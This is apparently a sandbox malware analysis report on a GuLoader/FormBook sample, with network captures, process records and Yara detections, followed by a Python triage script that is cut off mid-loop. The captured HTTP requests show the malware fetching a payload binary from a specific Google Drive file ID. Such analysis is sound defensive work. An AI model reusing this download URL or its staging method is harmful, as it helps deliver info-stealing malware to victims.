                                                Nov 8, 2024 14:23:34.321451902 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.321469069 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.321697950 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.325607061 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.325877905 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.325896025 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.326149940 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.329885960 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.330123901 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.330141068 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.330409050 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.334698915 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.334971905 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.334990025 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.335242033 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.339577913 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.339832067 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.339848995 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.340034962 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.346559048 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.346827030 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.346843958 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.347136974 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.348205090 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.348478079 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.348495007 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.348743916 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.352823973 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.353087902 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.353105068 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.353344917 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.357008934 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.357204914 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.357227087 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.357453108 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.359658003 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.359934092 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.359951973 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.360146046 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.368644953 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.368710995 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.368778944 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.368879080 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.368901968 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.368915081 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.369055033 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.369075060 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.369910002 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.370162964 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.370182037 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.370471001 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.372535944 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.372802973 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.372823954 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.373085022 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.375072956 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.375345945 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.375364065 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.375618935 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.377535105 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.377813101 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.377831936 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.378144026 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.380239964 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.380495071 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.380513906 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.380742073 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.384236097 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.384501934 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.384521008 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.384780884 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.388506889 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.388571024 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.388725996 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.388746977 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.388757944 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.388953924 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.390295029 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.390635967 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.390675068 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.390906096 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.392458916 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.392719030 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.392738104 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.392976046 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.394932032 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.395262957 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.395302057 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.395525932 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.397170067 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.397538900 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.397578955 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.397844076 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.399554014 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.399822950 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.399842978 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.400064945 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.401809931 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.402076006 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.402095079 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.402301073 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.411633968 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.411706924 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.411740065 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.411823988 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.411844969 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.411869049 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.411891937 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.412023067 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.412023067 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.412132978 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.413125038 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.413316011 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.413337946 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.413635969 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.415293932 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.415564060 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.415582895 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.415859938 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.417510033 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.417778969 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.417798996 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.418050051 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.419640064 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.419903994 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.419923067 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.420171976 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.421792030 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.422046900 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.422065973 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.422293901 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.424362898 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.424546957 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.424565077 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.424751997 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.432574987 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.432641029 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.432673931 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.432739019 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.432775974 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.432796955 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.432884932 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.433007956 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.434395075 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.434607029 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.434729099 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.434947968 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.436526060 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.436790943 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.436810970 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.437098980 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.438493013 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.438720942 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.438740015 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.438972950 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.440531969 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.440754890 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.440773964 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.440990925 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.442523003 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.442783117 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.442800045 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.443038940 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.451936007 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.452008009 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.452049017 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.452137947 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.452214956 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.452214956 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.452234030 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.452363014 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.452442884 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.454056978 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.454265118 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.454284906 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.454497099 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.455727100 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.455996037 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.456017017 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.456265926 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.457623005 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.457844019 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.457864046 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.458079100 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.459459066 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.459724903 CET49763443192.168.11.20142.250.65.225
Timestamp                          | Source Port | Dest Port | Source IP     | Dest IP
Nov 8, 2024 14:23:30.879730940 CET | 54391       | 53        | 192.168.11.20 | 1.1.1.1
Nov 8, 2024 14:23:30.982893944 CET | 53          | 54391     | 1.1.1.1       | 192.168.11.20
Nov 8, 2024 14:23:31.496623039 CET | 61396       | 53        | 192.168.11.20 | 1.1.1.1
Nov 8, 2024 14:23:31.599538088 CET | 53          | 61396     | 1.1.1.1       | 192.168.11.20
Timestamp                          | Source IP     | Dest IP | Trans ID | OP Code            | Name                         | Type           | Class       | DNS over HTTPS
Nov 8, 2024 14:23:30.879730940 CET | 192.168.11.20 | 1.1.1.1 | 0x51e1   | Standard query (0) | drive.google.com             | A (IP address) | IN (0x0001) | false
Nov 8, 2024 14:23:31.496623039 CET | 192.168.11.20 | 1.1.1.1 | 0xcf54   | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp                          | Source IP | Dest IP       | Trans ID | Reply Code   | Name                         | CName | Address        | Type           | Class       | DNS over HTTPS
Nov 8, 2024 14:23:30.982893944 CET | 1.1.1.1   | 192.168.11.20 | 0x51e1   | No error (0) | drive.google.com             |       | 142.250.72.110 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 14:23:31.599538088 CET | 1.1.1.1   | 192.168.11.20 | 0xcf54   | No error (0) | drive.usercontent.google.com |       | 142.250.65.225 | A (IP address) | IN (0x0001) | false
                                                • drive.google.com
                                                • drive.usercontent.google.com
Session ID | Source IP     | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.11.20 | 49762       | 142.250.72.110 | 443              | 3100 | C:\Users\user\Desktop\LkzvfB4VFj.exe

Timestamp: 2024-11-08 13:23:31 UTC, Bytes transferred: 216, Direction: OUT
Data:
GET /uc?export=download&id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.google.com
Cache-Control: no-cache

Timestamp: 2024-11-08 13:23:31 UTC, Bytes transferred: 1766, Direction: IN
Data:
HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 08 Nov 2024 13:23:31 GMT
Location: https://drive.usercontent.google.com/download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-81ogKFfxjYAJ7LV_Ca_c8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP     | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.11.20 | 49763       | 142.250.65.225 | 443              | 3100 | C:\Users\user\Desktop\LkzvfB4VFj.exe

Timestamp: 2024-11-08 13:23:31 UTC, Bytes transferred: 258, Direction: OUT
Data:
GET /download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive

Timestamp: 2024-11-08 13:23:34 UTC, Bytes transferred: 4915, Direction: IN
Data:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="thEwhiR75.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 286784
Last-Modified: Wed, 09 Oct 2024 10:53:21 GMT
X-GUploader-UploadID: AHmUCY1goqz51DDG8tHWHMmu8WjBo9nLH65qK2_punls4l54EtnxK2S6oo5-D_iCnbPRUkDor5QnW4SDwQ
Date: Fri, 08 Nov 2024 13:23:33 GMT
Expires: Fri, 08 Nov 2024 13:23:33 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=YfZAAg==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close



Target ID: 0
Start time: 08:21:39
Start date: 08/11/2024
Path: C:\Users\user\Desktop\LkzvfB4VFj.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\LkzvfB4VFj.exe"
Imagebase: 0x400000
File size: 892'576 bytes
MD5 hash: A5104B4D665DC081181FD163DCE0BB77
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.92764803526.0000000005D64000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 08:23:24
Start date: 08/11/2024
Path: C:\Users\user\Desktop\LkzvfB4VFj.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\LkzvfB4VFj.exe"
Imagebase: 0x400000
File size: 892'576 bytes
MD5 hash: A5104B4D665DC081181FD163DCE0BB77
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

                                                Target ID:4
                                                Start time:08:24:03
                                                Start date:08/11/2024
                                                Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                Imagebase:0x140000000
                                                File size:16'696'840 bytes
                                                MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false
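The three records above describe a chain worth checking mechanically: the sample runs twice under the same path (Target ID 0 with a GuLoader hit in executable private memory, Target ID 3 with FormBook hits in a read/write private region), both copies exit, and an unrelated 64-bit, non-elevated process (RAVCpl64.exe) started last is still running. The script below is an added triage example, not part of the Joe Sandbox report or its tooling. It parses the process records (copied from this page, trimmed to the fields it needs), decodes the `.sdmp` memory-dump names attached to each Yara hit, and emits findings for those patterns. The dump-name field layout (target, sequence, timestamp, base address, page protection, region state, region type) is an assumption inferred from the names on this page, the protection/type constants are the standard Windows VirtualQuery values, and the finding codes are labels chosen for this example.

```python
"""Triage Joe Sandbox process records: added example, not report tooling."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Process records copied from this report (Target IDs 0, 3 and 4), trimmed
# to the fields used below; no values are invented.
REPORT = r"""
Target ID:0
Start time:08:21:39
Path:C:\Users\user\Desktop\LkzvfB4VFj.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\LkzvfB4VFj.exe"
Has elevated privileges:true
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.92764803526.0000000005D64000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:3
Start time:08:23:24
Path:C:\Users\user\Desktop\LkzvfB4VFj.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\LkzvfB4VFj.exe"
Has elevated privileges:true
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:4
Start time:08:24:03
Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
Has elevated privileges:false
Has exited:false
"""

# Standard Windows memory constants (winnt.h / VirtualQuery).
PAGE_PROTECT = {0x02: "R", 0x04: "RW", 0x20: "RX", 0x40: "RWX"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0xF0  # PAGE_EXECUTE* protections all sit in the high nibble


@dataclass
class YaraHit:
    rule: str
    target: int
    base: int
    protect: int
    mem_type: int


@dataclass
class Proc:
    target: int
    fields: Dict[str, str]
    hits: List[YaraHit] = field(default_factory=list)


def parse_dump_name(name: str) -> Tuple[int, int, int, int]:
    """Decode '<target>.<seq>.<ts>.<base>.<protect>.<state>.<type>.<x>.sdmp'.
    Field layout is an ASSUMPTION taken from the dump names in this report."""
    parts = name.split(".")
    if len(parts) != 9 or parts[-1] != "sdmp":
        raise ValueError(f"unexpected dump name: {name}")
    return int(parts[0]), int(parts[3], 16), int(parts[4], 16), int(parts[6], 16)


HIT_RE = re.compile(r"Rule: (?P<rule>[^,]+), Description: .*?, Source: (?P<src>[^\s,]+), Author:")


def parse_report(text: str) -> List[Proc]:
    """Split the report into blank-line separated process blocks."""
    procs: List[Proc] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields: Dict[str, str] = {}
        hits: List[YaraHit] = []
        for line in block.splitlines():
            line = line.strip()
            if line.startswith("•"):
                m = HIT_RE.search(line)
                if m:
                    tgt, base, prot, mtype = parse_dump_name(m["src"])
                    hits.append(YaraHit(m["rule"], tgt, base, prot, mtype))
            elif ":" in line:  # first colon separates key from value (paths keep their own colon)
                key, val = line.split(":", 1)
                fields[key.strip()] = val.strip()
        procs.append(Proc(int(fields["Target ID"]), fields, hits))
    return procs


def triage(procs: List[Proc], sample_path: Optional[str] = None) -> List[Tuple[int, str, str]]:
    """Return (target, code, detail) findings. Codes are labels chosen for this example."""
    sample_path = sample_path or procs[0].fields["Path"]
    sample_ids = {p.target for p in procs if p.fields["Path"].lower() == sample_path.lower()}
    findings: List[Tuple[int, str, str]] = []
    if len(sample_ids) > 1:
        ids = ",".join(str(i) for i in sorted(sample_ids))
        findings.append((max(sample_ids), "self-reexec", f"sample image launched {len(sample_ids)} times (targets {ids})"))
    for p in procs:
        for h in p.hits:
            if h.mem_type == 0x1000000:
                continue  # hit inside a mapped PE image is not an injection indicator by itself
            prot = PAGE_PROTECT.get(h.protect, hex(h.protect))
            mtype = MEM_TYPE.get(h.mem_type, hex(h.mem_type))
            code = "unpacked-exec-mem" if h.protect & EXEC_MASK else "staged-payload-mem"
            findings.append((p.target, code, f"{h.rule} at {h.base:#x} ({prot}, {mtype})"))
    sample_exited = all(p.fields.get("Has exited") == "true" for p in procs if p.target in sample_ids)
    for p in procs:
        if p.target not in sample_ids and sample_exited and p.fields.get("Has exited") == "false":
            wow = p.fields.get("Wow64 process (32bit)", "?")
            findings.append((p.target, "surviving-host", f"{p.fields['Path']} still running after the sample exited (Wow64={wow})"))
    return findings


if __name__ == "__main__":
    for target, code, detail in triage(parse_report(REPORT)):
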